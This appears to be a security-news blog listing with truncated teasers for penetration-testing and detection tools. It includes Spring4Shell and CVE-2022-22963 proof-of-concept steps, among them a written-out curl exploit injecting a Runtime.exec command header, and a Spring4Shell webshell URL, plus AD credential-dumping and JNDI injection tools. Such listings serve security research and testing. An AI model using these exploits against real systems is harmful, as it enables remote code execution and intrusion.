Spring4Shell-Poc – Spring Core RCE 0-day Vulnerability

Description of the vulnerability: https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html Construction of the POC: https://github.com/BobTheShoplifter/Spring4Shell-POC Steps to Build/Run Tested with JDK 11.0.14, Spring Boot 2.6.5, and Apache Tomcat 9.0.60 Run mvn clean package to build the application Rename demo-0.0.1-SNAPSHOT.war to spring-poc.war and copy this .war file to Tomcat’s webapps directory Run python exp.py –url http://localhost:8080/spring-poc/greeting If successful, the message 漏洞存在,shell地址为:http://localhost:8080/spring-poc/tomcatwar.jsp?pwd=j&cmd=whoamiRead More

linWinPwn – A Bash Script That Automates A Number Of Active Directory Enumeration And Vulnerability Checks

linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks. The script leverages and is dependent of a number of tools including: impacket, bloodhound, crackmapexec, ldapdomaindump, lsassy, smbmap, kerbrute, adidnsdump. Setup Git clone the repository and make the script executable git clone https://github.com/lefayjey/linWinPwncd linWinPwn; chmod +x linWinPwn.sh Install LinuxRead More

CVE-2022-22963 – PoC Spring Java Framework 0-day Remote Code Execution Vulnerability

To run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example: docker run -it -d -p 8080:8080 bobcheat/springboot-public Exploit Curl command: curl -i -s -k -X $’POST’ -H $’Host: 192.168.1.2:8080′ -H $’spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(“touch /tmp/test”)’ –data-binary $’exploit_poc’ $’http://192.168.1.2:8080/functionRouter’ Or using Burp suite: Credits https://github.com/hktalent/spring-spel-0day-poc Download CVE-2022-22963

CVE-2022-27254 – PoC For Vulnerability In Honda’s Remote Keyless System

PoC for vulnerability in Honda’s Remote Keyless System(CVE-2022-27254) Disclaimer: For educational purposes only. Kindly note that the discoverers for this vulnerability are Ayyappan Rajesh, a student at UMass Dartmouth and HackingIntoYourHeart. Others mentioned in this repository are credited for the support that they have provided but have played no active role in any research conductedRead More

Request_Smuggler – Http Request Smuggling Vulnerability Scanner

Based on the amazing research by James Kettle. The tool can help to find servers that may be vulnerable to request smuggling vulnerability. Usage USAGE: request_smuggler [OPTIONS] –url <url>FLAGS: -h, –help Prints help information -V, –version Prints version informationOPTIONS: –amount-of-payloads <amount-of-payloads> low/medium/all [default: low] -t, –attack-types <attack-types> [ClTeMethod, ClTePath, ClTeTime, TeClMethod, TeClPath, TeClTime] [default: “ClTeTime”Read More

WSVuls – Website Vulnerability Scanner Detect Issues (Outdated Server Software And Insecure HTTP Headers)

WSVuls Website vulnerability scanner detect issues [ outdated server software and insecure HTTP headers.] What’s WSVuls? WSVuls is a simple and powerful command line tool for Linux, Windows and macOS. It’s designed for developers/testers and for those workers in IT who want to test vulnerabilities and analyses website from a single command. It detects issuesRead More

JNDI-Injection-Exploit – A Tool Which Generates JNDI Links Can Start Several Servers To Exploit JNDI Injection Vulnerability

JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server,LDAP server and HTTP server. RMI server and LDAP server are based on marshals and modified further to link with HTTP server. Using this tool allows you get JNDI links, you can insert these links into your POC toRead More

VulnLab – A Web Vulnerability Lab Project

VulnLab A web vulnerability lab project developed by Yavuzlar. Vulnerabilities SQL Injection Cross Site Scripting (XSS) Command Injection Insecure Direct Object References (IDOR) Cross Site Request Forgery (CSRF) XML External Entity (XXE) Insecure Deserialization File Upload File Inclusion Broken Authentication Installation Install with DockerHub If you want to install on DockerHub, just type this command.Read More

Wireshark-Forensics-Plugin – A cross-platform Wireshark plugin that correlates network traffic data with threat intelligence, asset categorization & vulnerability data

Wireshark is the most widely used network traffic analyzer. It is an important tool for both live traffic analysis & forensic analysis for forensic/malware analysts. Even though Wireshark provides incredibly powerful functionalities for protocol parsing & filtering, it does not provide any contextual information about network endpoints. For a typical analyst, who has to combRead More

Log4J-Detect – Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Multithreading

Simple Python 3 script to detect the “Log4j” Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script “log4j-detect.py” developed in Python 3 is responsible for detecting whether a list of URLs are vulnerable to CVE-2021-44228. To do so, it sends a GET request using threads (higher performance) to each of theRead More

X